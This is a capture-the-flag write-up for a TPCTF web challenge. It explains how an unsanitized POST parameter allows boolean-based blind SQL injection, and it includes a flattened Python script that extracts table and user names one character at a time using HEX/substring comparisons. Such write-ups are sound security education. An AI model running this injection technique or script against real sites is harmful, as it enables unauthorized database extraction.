I’ve created a new website so you can do all your important management. It includes users, creating things, reading things, and… well, not much else. Maybe there’s a flag?
Second instance running at 52.90.229.46:8558
tpctf{san1t1z3_y0ur_1npu7s} is not the correct flag. Look harder ;) Note: the flag format is flag{}, not the usual tpctf{}
Author: Kevin Higgs
Opening the website we can see we can choose the user:
After doing this its shown a new form where we could read/insert into the columns data from the table users from the current user:
It’s shown in the website! all inputs are being sanitized for the exception of the POST parameter number! I used Blind Sql injection to do this challenge (Boolean Based) the base payload I used was
It’s important to use HEX function because substring is case insensitive and would return wrong queries if we didn’t use it, notice that what is going to be shown in the page is the result of the comparison we are making in the sql query so if the comparison is true our query will show in the page Result: 1 if it’s false it will return Result: 0, doing this by hand is tedious so I wrote a python script to automate the stuff:
url='http://52.90.229.46:8558' TABLE_NAME = 'SELECT hex(substring(table_name,1,%d)) FROM information_schema.tables WHERE table_schema=database() limit %d,1' SUBSTRING_HEX_NAME = "hex(substring('{}',1,{}))" USERS_NAME = 'SELECT hex(substring(name,1,%d)) FROM users limit %d,1'
name = '' cookie = {'user': 'kevin'} for j in range(1,5): name = '' for i in range(1,60+1): stop = True for l in string.printable: PAYLOAD = "1`=if((%s)=%s,`1`, 'False'),`9" % (USERS_NAME%(i,j), SUBSTRING_HEX_NAME.format(name+l,i))#SUBSTRING_NAME.format(name+l, i)) #print PAYLOAD r = requests.post(url, data={'number':'%s'%PAYLOAD,'action':'Read', 'value':''}, cookies=cookie, timeout=6) if'Result: 1'in r.text: #print '-----------------------------------' name += l print name stop = False break if stop: break #if(1=1,sleep(6),0)
